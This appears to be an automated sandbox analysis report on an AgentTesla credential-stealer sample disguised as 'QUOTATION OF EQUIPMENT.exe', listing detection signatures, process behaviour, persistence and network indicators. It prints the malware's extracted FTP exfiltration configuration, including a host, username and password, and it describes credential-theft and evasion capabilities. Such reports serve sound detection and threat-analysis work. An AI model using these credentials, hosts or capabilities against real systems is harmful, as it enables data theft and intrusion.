Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTATION OF EQUIPMENT.exe

Overview

General Information

Sample Name:QUOTATION OF EQUIPMENT.exe
Analysis ID:502687
MD5:6f058c62ace41a97a12e6e7a47c9c76e
SHA1:9c5e94ba757e2387a510bc10559136cb308ce535
SHA256:713bcae8bce87e51a3b3f1448d816dce365302918c476d4bbe964b4834db3ccf
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected AgentTesla
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • QUOTATION OF EQUIPMENT.exe (PID: 6748 cmdline: 'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe' MD5: 6F058C62ACE41A97A12E6E7A47C9C76E)
    • QUOTATION OF EQUIPMENT.exe (PID: 6716 cmdline: 'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe' MD5: 6F058C62ACE41A97A12E6E7A47C9C76E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.omindexgroup.com/", "Username": "info@omindexgroup.com", "Password": "tlW}sP3mS7Z3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000001.00000002.566777680.00000000022E0000.00000004.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.QUOTATION OF EQUIPMENT.exe.3335530.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.2.QUOTATION OF EQUIPMENT.exe.3335530.4.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                1.2.QUOTATION OF EQUIPMENT.exe.415058.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.QUOTATION OF EQUIPMENT.exe.415058.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.QUOTATION OF EQUIPMENT.exe.2451458.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 25 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.2.QUOTATION OF EQUIPMENT.exe.415058.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.omindexgroup.com/", "Username": "info@omindexgroup.com", "Password": "tlW}sP3mS7Z3"}
                      Machine Learning detection for sampleShow sources
                      Source: QUOTATION OF EQUIPMENT.exeJoe Sandbox ML: detected
                      Source: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeUnpacked PE file: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpack
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeUnpacked PE file: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack
                      Source: QUOTATION OF EQUIPMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: Binary string: wntdll.pdbUGP source: QUOTATION OF EQUIPMENT.exe, 00000000.00000003.306358828.000000000F0D0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: QUOTATION OF EQUIPMENT.exe, 00000000.00000003.306358828.000000000F0D0000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00402671 FindFirstFileA,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00404A29 FindFirstFileExW,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.3:49832 -> 192.119.9.178:21
                      Source: TrafficSnort IDS: 2029928 ET TROJAN AgentTesla HTML System Info Report Exfil via FTP 192.168.2.3:49833 -> 192.119.9.178:55115
                      Source: Joe Sandbox ViewASN Name: 24SHELLSUS 24SHELLSUS
                      Source: Joe Sandbox ViewIP Address: 192.119.9.178 192.119.9.178
                      Source: unknownFTP traffic detected: 192.119.9.178:21 -> 192.168.2.3:49832 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.omindexgroup.com/info
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: http://ftp.omindexgroup.com
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, QUOTATION OF EQUIPMENT.exe, 00000001.00000003.514210140.00000000005C4000.00000004.00000001.sdmpString found in binary or memory: http://kMfms0NpHAa2q.org
                      Source: QUOTATION OF EQUIPMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                      Source: QUOTATION OF EQUIPMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: http://yJUdUS.com
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: QUOTATION OF EQUIPMENT.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: ftp.omindexgroup.com
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: QUOTATION OF EQUIPMENT.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack, u003cPrivateImplementationDetailsu003eu007bADDD92D2u002d841Au002d42EAu002dB77Cu002d1470A1722442u007d/u00347097661u002d7D05u002d4653u002d940Au002dC774450E8E39.csLarge array initialization: .cctor: array initializer size 11940
                      Source: QUOTATION OF EQUIPMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_004047D3
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_004061D4
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E46A24
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E46A33
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0040A2A5
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_021846A0
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_021845B0
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0218D310
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_05929790
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_059246F8
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_05925310
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_0592E260
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_05924A40
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_05EB0EA0
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_1_0040A2A5
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: String function: 00401ED0 appears 46 times
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: String function: 0040569E appears 36 times
                      Source: QUOTATION OF EQUIPMENT.exe, 00000000.00000003.297338018.000000000F1E6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION OF EQUIPMENT.exe
                      Source: QUOTATION OF EQUIPMENT.exe, 00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameeoQopvcgKxToaqzqUBTWKQEmbNlozHuMTqggKL.exe4 vs QUOTATION OF EQUIPMENT.exe
                      Source: QUOTATION OF EQUIPMENT.exeBinary or memory string: OriginalFilename vs QUOTATION OF EQUIPMENT.exe
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameeoQopvcgKxToaqzqUBTWKQEmbNlozHuMTqggKL.exe4 vs QUOTATION OF EQUIPMENT.exe
                      Source: QUOTATION OF EQUIPMENT.exe, 00000001.00000002.565195545.0000000000199000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs QUOTATION OF EQUIPMENT.exe
                      Source: QUOTATION OF EQUIPMENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile read: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeJump to behavior
                      Source: QUOTATION OF EQUIPMENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe 'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe'
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess created: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe 'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe'
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess created: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe 'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe'
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile created: C:\Users\user\AppData\Roaming\newappJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nscC7D6.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@1/1
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
                      Source: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Binary string: wntdll.pdbUGP source: QUOTATION OF EQUIPMENT.exe, 00000000.00000003.306358828.000000000F0D0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: QUOTATION OF EQUIPMENT.exe, 00000000.00000003.306358828.000000000F0D0000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeUnpacked PE file: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeUnpacked PE file: 1.2.QUOTATION OF EQUIPMENT.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeUnpacked PE file: 1.2.QUOTATION OF EQUIPMENT.exe.4810000.5.unpack
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 0_2_72E41080 push eax; ret
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_2_00401F16 push ecx; ret
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeCode function: 1_1_00401F16 push ecx; ret
                      Source: QUOTATION OF EQUIPMENT.exeStatic PE information: real checksum: 0x0 should be: 0x6e839
                      Source: eluwnahujm.dll.0.drStatic PE information: real checksum: 0xca76 should be: 0x1039d
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nsxC806.tmp\eluwnahujm.dllJump to dropped file
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
